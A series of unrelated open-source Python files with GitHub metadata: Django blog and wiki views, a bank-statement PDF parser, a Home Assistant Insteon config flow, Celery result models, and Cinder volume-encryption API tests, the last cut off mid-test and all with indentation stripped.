@select_theme
def show_blog(request, blog_data):
return object_list(
request, queryset = blog_data["posts"],
template_name = loader.select_template(
["blog/%s/index.html" % blog_data["name"], "blog/index.html"]
).name,
template_object_name = "post", paginate_by = 10,
extra_context = { 'blog_data': blog_data },
)
# }}}
# show_category # {{{
@select_theme
def show_category(request, blog_data, label_name):
try:
category_data = blog_data["labels"][label_name]
except KeyError: raise Http404
return object_list(
request, queryset = category_data["posts"],
template_name = loader.select_template(
["blog/%s/category.html" % blog_data["name"], "blog/category.html"]
).name,
template_object_name = "post", paginate_by = 10,
extra_context = {
'blog_data': blog_data, 'category_data': category_data
},
)
# }}}
# show_post # {{{
@select_theme
def show_post(request):
blog_data = utils.global_blog_dict[request.path]
post = blog_data["posts"][request.path]
remote_ip = request.META['REMOTE_ADDR']
if request.method == "POST":
form = forms.CommentForm(request, remote_ip, request.POST)
if form.is_valid():
chash = "#comment%s" % form.save(post["document"]).gid()
return HttpResponseRedirect(request.path + chash)
else:
form = forms.CommentForm(request, remote_ip)
return render_to_response(
["blog/%s/post.html" % blog_data["name"], "blog/post.html", ],
{ 'blog_data': blog_data, 'post': post, 'form': form },
context_instance = RequestContext(request)
)
# }}}
def show_archive(request, blog_name, archive_format): pass
# }}}
# wiki related views # {{{
# show_wiki # {{{
@select_theme
def show_wiki(request):
document = utils.global_wiki_dict[request.path]
if document.meta.get("private"):
if not unicode(request.openid) in (
document.meta.get(
"viewers", []
) + gsettings.LOCAL_REPO_PATH.joinpath(
"editors.txt"
).read().split()
):
raise Http404
remote_ip = request.META['REMOTE_ADDR']
if request.method == "POST":
form = forms.CommentForm(request, remote_ip, request.POST)
if form.is_valid():
chash = "#comment%s" % form.save(document).gid()
return HttpResponseRedirect(request.path + chash)
else:
form = forms.CommentForm(request, remote_ip)
return render_to_response(
[
document.meta.get("template", "non_existant"),
"wiki/page.html"
],
{ 'document': document, 'form': form },
context_instance = RequestContext(request)
)
# }}}
def add_comment(request, document_name): pass
def index(request): return HttpResponse("OK")
# }}}
@select_theme
def show_document(request, name):
if not settings.LOCAL_INSTANCE: raise Http404
document = Document(name)
if not document.exists(): raise Http404
return render_to_response(
"document.html", { 'document': document },
context_instance=RequestContext(request),
)
|
{
"content_hash": "f0294f04da4167e76e6639d967f734c9",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 79,
"avg_line_length": 33.108333333333334,
"alnum_prop": 0.6332746035741253,
"repo_name": "amitu/gitology",
"id": "ba9ad758c3a702ef5fff550e4d8950c419100b4e",
"size": "3989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gitology/d/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "145790"
}
],
"symlink_target": ""
}
|
import argparse
import codecs
import datetime
import json
import logging
import os.path
import subprocess
import tempfile
import inseven.finance
PDF_TABLE_COLUMNS = ["Date", "Payment ", "type ", "and ", "details", "Paid ", "out", "Paid ", "in", "Balance"]
PDF_TABLE_START = ["BALANCE ", "BROUGHT ", "FORWARD"]
PDF_TABLE_END = ["BALANCE ", "CARRIED ", "FORWARD"]
PDF_POSITION_THRESHOLD = 20
def pdf2json(path):
with tempfile.NamedTemporaryFile(delete=False) as temp:
subprocess.check_output(["/usr/local/bin/pdf2json", path, temp.name])
with codecs.open(temp.name, "r", "ISO-8859-1") as f:
return json.loads(f.read())
def line_matches_offset(line, strings, offset):
try:
for i, data in enumerate(strings):
if line[i + offset]["data"] != data:
return False
except IndexError:
return False
return True
def line_matches(line, strings):
if len(line) < len(strings):
return False
else:
for i in xrange(0, len(line) - len(strings) + 1):
if line_matches_offset(line, strings, i):
return True
return False
def lines_between(lines, start, end):
result = []
active = False
for line in lines:
if line_matches(line, start):
active = True
result.append(line)
elif line_matches(line, end):
active = False
else:
if active:
result.append(line)
return result
def format_number(text):
return float(text.replace(",", ""))
def parse_page(page, date=None):
nodes = sorted(page["text"], key=lambda x: x["top"])
# Group the individual nodes into lines.
lines = []
top = 0
line = []
for node in nodes:
if node["top"] != top:
line = []
lines.append(line)
top = node["top"]
line.append(node)
# Determine the column offsets.
details = None
for line in lines:
if line_matches(line, PDF_TABLE_COLUMNS):
details = [line[0]["left"], line[1]["left"], line[5]["left"], line[7]["left"], line[9]["left"]]
# Filter out the lines we're interested in.
statements = lines_between(lines, PDF_TABLE_START, PDF_TABLE_END)
record = None
results = []
for line in statements:
# Check to see if the row has changed.
line = sorted(line, key=lambda x: x["left"])
if line[0]["left"] == details[0] or line[0]["left"] == details[1] or record is None:
record = inseven.finance.Record()
results.append(record)
# Process nodes for the current row.
for node in line:
logging.debug(line)
left = node["left"]
data = node["data"]
if left >= details[4] - PDF_POSITION_THRESHOLD:
logging.debug("Parsing '%s'..." % data)
if data == "D":
record.balance = -1 * record.balance
else:
record.balance = format_number(data)
elif left >= details[3] - PDF_POSITION_THRESHOLD:
# Paid in.
record.value = format_number(data)
elif left >= details[2] - PDF_POSITION_THRESHOLD:
# Paid out.
record.value = (format_number(data) * -1)
elif left >= details[1]:
record.description = (record.description + " " + data).strip()
elif left > details[0]:
date = (date + " " + data).strip()
elif left == details[0]:
date = data.strip()
# Keep attempting to parse the date until we have a valid date.
try:
record.date = datetime.datetime.strptime(date, "%d %b %y")
except ValueError:
pass
if not len(results):
return (results, date, None)
# Check and retrieve the starting balance.
balance = results.pop(0)
assert balance.description == "BALANCE BROUGHT FORWARD", "Unable to determine starting balance."
return (results, date, balance.balance)
def parse_pdf(path):
contents = pdf2json(path)
results = []
date = None
starting_balance = None
for page in contents:
(records, date, balance) = parse_page(page, date)
if starting_balance is None:
starting_balance = balance
results.extend(records)
total = starting_balance
for result in results:
logging.debug("%s", result)
total = total + result.value
if result.balance is not None:
assert abs(total - result.balance) < 0.0001, "Unable to reconcile balances"
return results
|
{
"content_hash": "7490079ef3da96b3e3261977e5acdf55",
"timestamp": "",
"source": "github",
"line_count": 158,
"max_line_length": 111,
"avg_line_length": 29.848101265822784,
"alnum_prop": 0.5623409669211196,
"repo_name": "jbmorley/html-to-qif",
"id": "994d5c85d05e152211bd3c4afef65bb8012e89a3",
"size": "4739",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "inseven/sense.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8539"
}
],
"symlink_target": ""
}
|
default_app_config = 'map.apps.MapConfig'
|
{
"content_hash": "ac5ed509342e0a047726338a50663de4",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 41,
"avg_line_length": 42,
"alnum_prop": 0.7619047619047619,
"repo_name": "jayArnel/crimemapping",
"id": "d6dc6afadca64b7cf44901cb1da8d878e3544eb9",
"size": "42",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "map/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7772"
},
{
"name": "CSS",
"bytes": "152276"
},
{
"name": "HTML",
"bytes": "12541"
},
{
"name": "JavaScript",
"bytes": "61256"
},
{
"name": "Makefile",
"bytes": "7686"
},
{
"name": "Python",
"bytes": "64964"
}
],
"symlink_target": ""
}
|
"""Test config flow for Insteon."""
from __future__ import annotations
import logging
from pyinsteon import async_connect
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import dhcp, usb
from homeassistant.const import (
CONF_ADDRESS,
CONF_DEVICE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_HOUSECODE,
CONF_HUB_VERSION,
CONF_OVERRIDE,
CONF_UNITCODE,
CONF_X10,
DOMAIN,
SIGNAL_ADD_DEVICE_OVERRIDE,
SIGNAL_ADD_X10_DEVICE,
SIGNAL_REMOVE_DEVICE_OVERRIDE,
SIGNAL_REMOVE_X10_DEVICE,
)
from .schemas import (
add_device_override,
add_x10_device,
build_device_override_schema,
build_hub_schema,
build_plm_schema,
build_remove_override_schema,
build_remove_x10_schema,
build_x10_schema,
)
STEP_PLM = "plm"
STEP_HUB_V1 = "hubv1"
STEP_HUB_V2 = "hubv2"
STEP_CHANGE_HUB_CONFIG = "change_hub_config"
STEP_ADD_X10 = "add_x10"
STEP_ADD_OVERRIDE = "add_override"
STEP_REMOVE_OVERRIDE = "remove_override"
STEP_REMOVE_X10 = "remove_x10"
MODEM_TYPE = "modem_type"
PLM = "PowerLinc Modem (PLM)"
HUB1 = "Hub version 1 (pre-2014)"
HUB2 = "Hub version 2"
_LOGGER = logging.getLogger(__name__)
def _only_one_selected(*args):
"""Test if only one item is True."""
return sum(args) == 1
async def _async_connect(**kwargs):
"""Connect to the Insteon modem."""
try:
await async_connect(**kwargs)
_LOGGER.info("Connected to Insteon modem")
return True
except ConnectionError:
_LOGGER.error("Could not connect to Insteon modem")
return False
def _remove_override(address, options):
"""Remove a device override from config."""
new_options = {}
if options.get(CONF_X10):
new_options[CONF_X10] = options.get(CONF_X10)
new_overrides = []
for override in options[CONF_OVERRIDE]:
if override[CONF_ADDRESS] != address:
new_overrides.append(override)
if new_overrides:
new_options[CONF_OVERRIDE] = new_overrides
return new_options
def _remove_x10(device, options):
"""Remove an X10 device from the config."""
housecode = device[11].lower()
unitcode = int(device[24:])
new_options = {}
if options.get(CONF_OVERRIDE):
new_options[CONF_OVERRIDE] = options.get(CONF_OVERRIDE)
new_x10 = []
for existing_device in options[CONF_X10]:
if (
existing_device[CONF_HOUSECODE].lower() != housecode
or existing_device[CONF_UNITCODE] != unitcode
):
new_x10.append(existing_device)
if new_x10:
new_options[CONF_X10] = new_x10
return new_options, housecode, unitcode
class InsteonFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Insteon config flow handler."""
_device_path: str | None = None
_device_name: str | None = None
discovered_conf: dict[str, str] = {}
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> InsteonOptionsFlowHandler:
"""Define the config flow to handle options."""
return InsteonOptionsFlowHandler(config_entry)
async def async_step_user(self, user_input=None):
"""Init the config flow."""
errors = {}
if self._async_current_entries():
return self.async_abort(reason="single_instance_allowed")
if user_input is not None:
selection = user_input.get(MODEM_TYPE)
if selection == PLM:
return await self.async_step_plm()
if selection == HUB1:
return await self.async_step_hubv1()
return await self.async_step_hubv2()
modem_types = [PLM, HUB1, HUB2]
data_schema = vol.Schema({vol.Required(MODEM_TYPE): vol.In(modem_types)})
return self.async_show_form(
step_id="user", data_schema=data_schema, errors=errors
)
async def async_step_plm(self, user_input=None):
"""Set up the PLM modem type."""
errors = {}
if user_input is not None:
if await _async_connect(**user_input):
return self.async_create_entry(title="", data=user_input)
errors["base"] = "cannot_connect"
schema_defaults = user_input if user_input is not None else {}
data_schema = build_plm_schema(**schema_defaults)
return self.async_show_form(
step_id=STEP_PLM, data_schema=data_schema, errors=errors
)
async def async_step_hubv1(self, user_input=None):
"""Set up the Hub v1 modem type."""
return await self._async_setup_hub(hub_version=1, user_input=user_input)
async def async_step_hubv2(self, user_input=None):
"""Set up the Hub v2 modem type."""
return await self._async_setup_hub(hub_version=2, user_input=user_input)
async def _async_setup_hub(self, hub_version, user_input):
"""Set up the Hub versions 1 and 2."""
errors = {}
if user_input is not None:
user_input[CONF_HUB_VERSION] = hub_version
if await _async_connect(**user_input):
return self.async_create_entry(title="", data=user_input)
user_input.pop(CONF_HUB_VERSION)
errors["base"] = "cannot_connect"
schema_defaults = user_input if user_input is not None else self.discovered_conf
data_schema = build_hub_schema(hub_version=hub_version, **schema_defaults)
step_id = STEP_HUB_V2 if hub_version == 2 else STEP_HUB_V1
return self.async_show_form(
step_id=step_id, data_schema=data_schema, errors=errors
)
async def async_step_import(self, import_info):
"""Import a yaml entry as a config entry."""
if self._async_current_entries():
return self.async_abort(reason="single_instance_allowed")
if not await _async_connect(**import_info):
return self.async_abort(reason="cannot_connect")
return self.async_create_entry(title="", data=import_info)
async def async_step_usb(self, discovery_info: usb.UsbServiceInfo) -> FlowResult:
"""Handle USB discovery."""
if self._async_current_entries():
return self.async_abort(reason="single_instance_allowed")
dev_path = await self.hass.async_add_executor_job(
usb.get_serial_by_id, discovery_info.device
)
self._device_path = dev_path
self._device_name = usb.human_readable_device_name(
dev_path,
discovery_info.serial_number,
discovery_info.manufacturer,
discovery_info.description,
discovery_info.vid,
discovery_info.pid,
)
self._set_confirm_only()
self.context["title_placeholders"] = {
CONF_NAME: f"Insteon PLM {self._device_name}"
}
await self.async_set_unique_id(config_entries.DEFAULT_DISCOVERY_UNIQUE_ID)
return await self.async_step_confirm_usb()
async def async_step_confirm_usb(self, user_input=None):
"""Confirm a USB discovery."""
if user_input is not None:
return await self.async_step_plm({CONF_DEVICE: self._device_path})
return self.async_show_form(
step_id="confirm_usb",
description_placeholders={CONF_NAME: self._device_name},
)
async def async_step_dhcp(self, discovery_info: dhcp.DhcpServiceInfo) -> FlowResult:
"""Handle a DHCP discovery."""
self.discovered_conf = {CONF_HOST: discovery_info.ip}
self.context["title_placeholders"] = {
CONF_NAME: f"Insteon Hub {discovery_info.ip}"
}
await self.async_set_unique_id(format_mac(discovery_info.macaddress))
return await self.async_step_user()
class InsteonOptionsFlowHandler(config_entries.OptionsFlow):
"""Handle an Insteon options flow."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Init the InsteonOptionsFlowHandler class."""
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Init the options config flow."""
errors = {}
if user_input is not None:
change_hub_config = user_input.get(STEP_CHANGE_HUB_CONFIG, False)
device_override = user_input.get(STEP_ADD_OVERRIDE, False)
x10_device = user_input.get(STEP_ADD_X10, False)
remove_override = user_input.get(STEP_REMOVE_OVERRIDE, False)
remove_x10 = user_input.get(STEP_REMOVE_X10, False)
if _only_one_selected(
change_hub_config,
device_override,
x10_device,
remove_override,
remove_x10,
):
if change_hub_config:
return await self.async_step_change_hub_config()
if device_override:
return await self.async_step_add_override()
if x10_device:
return await self.async_step_add_x10()
if remove_override:
return await self.async_step_remove_override()
if remove_x10:
return await self.async_step_remove_x10()
errors["base"] = "select_single"
data_schema = {
vol.Optional(STEP_ADD_OVERRIDE): bool,
vol.Optional(STEP_ADD_X10): bool,
}
if self.config_entry.data.get(CONF_HOST):
data_schema[vol.Optional(STEP_CHANGE_HUB_CONFIG)] = bool
options = {**self.config_entry.options}
if options.get(CONF_OVERRIDE):
data_schema[vol.Optional(STEP_REMOVE_OVERRIDE)] = bool
if options.get(CONF_X10):
data_schema[vol.Optional(STEP_REMOVE_X10)] = bool
return self.async_show_form(
step_id="init", data_schema=vol.Schema(data_schema), errors=errors
)
async def async_step_change_hub_config(self, user_input=None):
"""Change the Hub configuration."""
if user_input is not None:
data = {
**self.config_entry.data,
CONF_HOST: user_input[CONF_HOST],
CONF_PORT: user_input[CONF_PORT],
}
if self.config_entry.data[CONF_HUB_VERSION] == 2:
data[CONF_USERNAME] = user_input[CONF_USERNAME]
data[CONF_PASSWORD] = user_input[CONF_PASSWORD]
self.hass.config_entries.async_update_entry(self.config_entry, data=data)
return self.async_create_entry(
title="",
data={**self.config_entry.options},
)
data_schema = build_hub_schema(**self.config_entry.data)
return self.async_show_form(
step_id=STEP_CHANGE_HUB_CONFIG, data_schema=data_schema
)
async def async_step_add_override(self, user_input=None):
"""Add a device override."""
errors = {}
if user_input is not None:
try:
data = add_device_override({**self.config_entry.options}, user_input)
async_dispatcher_send(self.hass, SIGNAL_ADD_DEVICE_OVERRIDE, user_input)
return self.async_create_entry(title="", data=data)
except ValueError:
errors["base"] = "input_error"
schema_defaults = user_input if user_input is not None else {}
data_schema = build_device_override_schema(**schema_defaults)
return self.async_show_form(
step_id=STEP_ADD_OVERRIDE, data_schema=data_schema, errors=errors
)
async def async_step_add_x10(self, user_input=None):
"""Add an X10 device."""
errors = {}
if user_input is not None:
options = add_x10_device({**self.config_entry.options}, user_input)
async_dispatcher_send(self.hass, SIGNAL_ADD_X10_DEVICE, user_input)
return self.async_create_entry(title="", data=options)
schema_defaults = user_input if user_input is not None else {}
data_schema = build_x10_schema(**schema_defaults)
return self.async_show_form(
step_id=STEP_ADD_X10, data_schema=data_schema, errors=errors
)
async def async_step_remove_override(self, user_input=None):
"""Remove a device override."""
errors = {}
options = self.config_entry.options
if user_input is not None:
options = _remove_override(user_input[CONF_ADDRESS], options)
async_dispatcher_send(
self.hass,
SIGNAL_REMOVE_DEVICE_OVERRIDE,
user_input[CONF_ADDRESS],
)
return self.async_create_entry(title="", data=options)
data_schema = build_remove_override_schema(options[CONF_OVERRIDE])
return self.async_show_form(
step_id=STEP_REMOVE_OVERRIDE, data_schema=data_schema, errors=errors
)
async def async_step_remove_x10(self, user_input=None):
"""Remove an X10 device."""
errors = {}
options = self.config_entry.options
if user_input is not None:
options, housecode, unitcode = _remove_x10(user_input[CONF_DEVICE], options)
async_dispatcher_send(
self.hass, SIGNAL_REMOVE_X10_DEVICE, housecode, unitcode
)
return self.async_create_entry(title="", data=options)
data_schema = build_remove_x10_schema(options[CONF_X10])
return self.async_show_form(
step_id=STEP_REMOVE_X10, data_schema=data_schema, errors=errors
)
|
{
"content_hash": "baaa20cc9cd13152ce8dffcd5cb87f19",
"timestamp": "",
"source": "github",
"line_count": 370,
"max_line_length": 88,
"avg_line_length": 37.616216216216216,
"alnum_prop": 0.6108636298318724,
"repo_name": "nkgilley/home-assistant",
"id": "d9261a65c32d74352f99fc1ad0ef68993168a46a",
"size": "13918",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/insteon/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "51597279"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
from datetime import datetime
import sqlalchemy as sa
from celery import states
from celery.db.session import ResultModelBase
# See docstring of a805d4bd for an explanation for this workaround ;)
from celery.db.a805d4bd import PickleType
class Task(ResultModelBase):
"""Task result/status."""
__tablename__ = "celery_taskmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(sa.Integer, sa.Sequence("task_id_sequence"),
primary_key=True,
autoincrement=True)
task_id = sa.Column(sa.String(255))
status = sa.Column(sa.String(50), default=states.PENDING)
result = sa.Column(PickleType, nullable=True)
date_done = sa.Column(sa.DateTime, default=datetime.now,
onupdate=datetime.now, nullable=True)
traceback = sa.Column(sa.Text, nullable=True)
def __init__(self, task_id):
self.task_id = task_id
def to_dict(self):
return {"task_id": self.task_id,
"status": self.status,
"result": self.result,
"traceback": self.traceback}
def __repr__(self):
return "<Task %s state: %s>" % (self.task_id, self.status)
class TaskSet(ResultModelBase):
"""TaskSet result"""
__tablename__ = "celery_tasksetmeta"
__table_args__ = {"sqlite_autoincrement": True}
id = sa.Column(sa.Integer, sa.Sequence("taskset_id_sequence"),
autoincrement=True, primary_key=True)
taskset_id = sa.Column(sa.String(255))
result = sa.Column(sa.PickleType, nullable=True)
date_done = sa.Column(sa.DateTime, default=datetime.now,
nullable=True)
def __init__(self, taskset_id, result):
self.taskset_id = taskset_id
self.result = result
def to_dict(self):
return {"taskset_id": self.taskset_id,
"result": self.result}
def __repr__(self):
return u"<TaskSet: %s>" % (self.taskset_id, )
|
{
"content_hash": "c7d6e8c59cefe3e063fe5c6ee8f88b47",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 69,
"avg_line_length": 32.833333333333336,
"alnum_prop": 0.6142131979695431,
"repo_name": "mitsuhiko/celery",
"id": "0ff98b7a937ebce17058374df0cc4a3ccb50d570",
"size": "1970",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "celery/db/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "624101"
},
{
"name": "Shell",
"bytes": "5742"
}
],
"symlink_target": ""
}
|
import json
import webob
from cinder import context
from cinder import db
from cinder import test
from cinder.tests.api import fakes
from cinder.tests import fake_notifier
def return_volume_type_encryption(context, volume_type_id):
return stub_volume_type_encryption()
def stub_volume_type_encryption():
values = {
'cipher': 'fake_cipher',
'control_location': 'front-end',
'key_size': 256,
'provider': 'fake_provider',
'volume_type_id': 'fake_type_id',
}
return values
def volume_type_encryption_get(context, volume_type_id):
pass
class VolumeTypeEncryptionTest(test.TestCase):
_default_volume_type = {
'id': 'fake_type_id',
'name': 'fake_type',
}
def setUp(self):
super(VolumeTypeEncryptionTest, self).setUp()
self.flags(host='fake')
self.api_path = '/v2/fake/os-volume-types/1/encryption'
"""to reset notifier drivers left over from other api/contrib tests"""
fake_notifier.reset()
self.addCleanup(fake_notifier.reset)
def _get_response(self, volume_type, admin=True,
url='/v2/fake/types/%s/encryption',
req_method='GET', req_body=None,
req_headers=None):
ctxt = context.RequestContext('fake', 'fake', is_admin=admin)
req = webob.Request.blank(url % volume_type['id'])
req.method = req_method
req.body = req_body
if req_headers:
req.headers['Content-Type'] = req_headers
return req.get_response(fakes.wsgi_app(fake_auth_context=ctxt))
def _create_type_and_encryption(self, volume_type, body=None):
if body is None:
body = {"encryption": stub_volume_type_encryption()}
db.volume_type_create(context.get_admin_context(), volume_type)
return self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
def test_index(self):
self.stubs.Set(db, 'volume_type_encryption_get',
return_volume_type_encryption)
volume_type = self._default_volume_type
self._create_type_and_encryption(volume_type)
res = self._get_response(volume_type)
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
expected = stub_volume_type_encryption()
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_index_invalid_type(self):
volume_type = self._default_volume_type
res = self._get_response(volume_type)
self.assertEqual(404, res.status_code)
res_dict = json.loads(res.body)
expected = {
'itemNotFound': {
'code': 404,
'message': ('Volume type %s could not be found.'
% volume_type['id'])
}
}
self.assertEqual(expected, res_dict)
def test_show_key_size(self):
volume_type = self._default_volume_type
self._create_type_and_encryption(volume_type)
res = self._get_response(volume_type,
url='/v2/fake/types/%s/encryption/key_size')
res_dict = json.loads(res.body)
self.assertEqual(200, res.status_code)
self.assertEqual(256, res_dict['key_size'])
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_show_provider(self):
volume_type = self._default_volume_type
self._create_type_and_encryption(volume_type)
res = self._get_response(volume_type,
url='/v2/fake/types/%s/encryption/provider')
res_dict = json.loads(res.body)
self.assertEqual(200, res.status_code)
self.assertEqual('fake_provider', res_dict['provider'])
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_show_item_not_found(self):
volume_type = self._default_volume_type
self._create_type_and_encryption(volume_type)
res = self._get_response(volume_type,
url='/v2/fake/types/%s/encryption/fake')
res_dict = json.loads(res.body)
self.assertEqual(404, res.status_code)
expected = {
'itemNotFound': {
'code': 404,
'message': ('The resource could not be found.')
}
}
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def _create(self, cipher, control_location, key_size, provider):
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
body = {"encryption": {'cipher': cipher,
'control_location': control_location,
'key_size': key_size,
'provider': provider,
'volume_type_id': volume_type['id']}}
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 0)
res = self._get_response(volume_type)
res_dict = json.loads(res.body)
self.assertEqual(200, res.status_code)
# Confirm that volume type has no encryption information
# before create.
self.assertEqual('{}', res.body)
# Create encryption specs for the volume type
# with the defined body.
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 1)
# check response
self.assertIn('encryption', res_dict)
self.assertEqual(cipher, res_dict['encryption']['cipher'])
self.assertEqual(control_location,
res_dict['encryption']['control_location'])
self.assertEqual(key_size, res_dict['encryption']['key_size'])
self.assertEqual(provider, res_dict['encryption']['provider'])
self.assertEqual(volume_type['id'],
res_dict['encryption']['volume_type_id'])
# check database
encryption = db.volume_type_encryption_get(context.get_admin_context(),
volume_type['id'])
self.assertIsNotNone(encryption)
self.assertEqual(cipher, encryption['cipher'])
self.assertEqual(key_size, encryption['key_size'])
self.assertEqual(provider, encryption['provider'])
self.assertEqual(volume_type['id'], encryption['volume_type_id'])
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_json(self):
self._create('fake_cipher', 'front-end', 128, 'fake_encryptor')
def test_create_xml(self):
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
ctxt = context.RequestContext('fake', 'fake', is_admin=True)
req = webob.Request.blank('/v2/fake/types/%s/encryption'
% volume_type['id'])
req.method = 'POST'
req.body = ('<encryption provider="test_provider" '
'cipher="cipher" control_location="front-end" />')
req.headers['Content-Type'] = 'application/xml'
req.headers['Accept'] = 'application/xml'
res = req.get_response(fakes.wsgi_app(fake_auth_context=ctxt))
self.assertEqual(res.status_int, 200)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_invalid_volume_type(self):
volume_type = self._default_volume_type
body = {"encryption": stub_volume_type_encryption()}
# Attempt to create encryption without first creating type
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
self.assertEqual(len(fake_notifier.NOTIFICATIONS), 0)
self.assertEqual(404, res.status_code)
expected = {
'itemNotFound': {
'code': 404,
'message': ('Volume type %s could not be found.'
% volume_type['id'])
}
}
self.assertEqual(expected, res_dict)
def test_create_encryption_type_exists(self):
volume_type = self._default_volume_type
body = {"encryption": stub_volume_type_encryption()}
self._create_type_and_encryption(volume_type, body)
# Try to create encryption specs for a volume type
# that already has them.
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': ('Volume type encryption for type '
'fake_type_id already exists.')
}
}
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_volume_exists(self):
# Create the volume type and a volume with the volume type.
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
db.volume_create(context.get_admin_context(),
{'id': 'fake_id',
'display_description': 'Test Desc',
'size': 20,
'status': 'creating',
'instance_uuid': None,
'host': 'dummy',
'volume_type_id': volume_type['id']})
body = {"encryption": {'cipher': 'cipher',
'key_size': 128,
'control_location': 'front-end',
'provider': 'fake_provider',
'volume_type_id': volume_type['id']}}
# Try to create encryption specs for a volume type
# with a volume.
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': ('Cannot create encryption specs. '
'Volume type in use.')
}
}
self.assertEqual(expected, res_dict)
db.volume_destroy(context.get_admin_context(), 'fake_id')
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def _encryption_create_bad_body(self, body,
msg='Create body is not valid.'):
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
expected = {
'badRequest': {
'code': 400,
'message': (msg)
}
}
self.assertEqual(expected, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_create_no_body(self):
self._encryption_create_bad_body(body=None)
def test_create_malformed_entity(self):
body = {'encryption': 'string'}
self._encryption_create_bad_body(body=body)
def test_create_negative_key_size(self):
body = {"encryption": {'cipher': 'cipher',
'key_size': -128,
'provider': 'fake_provider',
'volume_type_id': 'volume_type'}}
msg = 'Invalid input received: key_size must be non-negative'
self._encryption_create_bad_body(body=body, msg=msg)
def test_create_none_key_size(self):
self._create('fake_cipher', 'front-end', None, 'fake_encryptor')
def test_create_invalid_control_location(self):
body = {"encryption": {'cipher': 'cipher',
'control_location': 'fake_control',
'provider': 'fake_provider',
'volume_type_id': 'volume_type'}}
msg = ("Invalid input received: Valid control location are: "
"['front-end', 'back-end']")
self._encryption_create_bad_body(body=body, msg=msg)
def test_create_no_provider(self):
body = {"encryption": {'cipher': 'cipher',
'volume_type_id': 'volume_type'}}
msg = ("Invalid input received: provider must be defined")
self._encryption_create_bad_body(body=body, msg=msg)
def test_delete(self):
volume_type = self._default_volume_type
db.volume_type_create(context.get_admin_context(), volume_type)
# Test that before create, there's nothing with a get
res = self._get_response(volume_type)
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual({}, res_dict)
body = {"encryption": {'cipher': 'cipher',
'key_size': 128,
'control_location': 'front-end',
'provider': 'fake_provider',
'volume_type_id': volume_type['id']}}
# Create, and test that get returns something
res = self._get_response(volume_type, req_method='POST',
req_body=json.dumps(body),
req_headers='application/json')
res_dict = json.loads(res.body)
res = self._get_response(volume_type, req_method='GET',
req_headers='application/json',
url='/v2/fake/types/%s/encryption')
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual(volume_type['id'], res_dict['volume_type_id'])
# Delete, and test that get returns nothing
res = self._get_response(volume_type, req_method='DELETE',
req_headers='application/json',
url='/v2/fake/types/%s/encryption/provider')
self.assertEqual(202, res.status_code)
self.assertEqual(0, len(res.body))
res = self._get_response(volume_type, req_method='GET',
req_headers='application/json',
url='/v2/fake/types/%s/encryption')
self.assertEqual(200, res.status_code)
res_dict = json.loads(res.body)
self.assertEqual({}, res_dict)
db.volume_type_destroy(context.get_admin_context(), volume_type['id'])
def test_delete_with_volume_in_use(self):
# Create the volume type
volume_type = self._default_volume_type
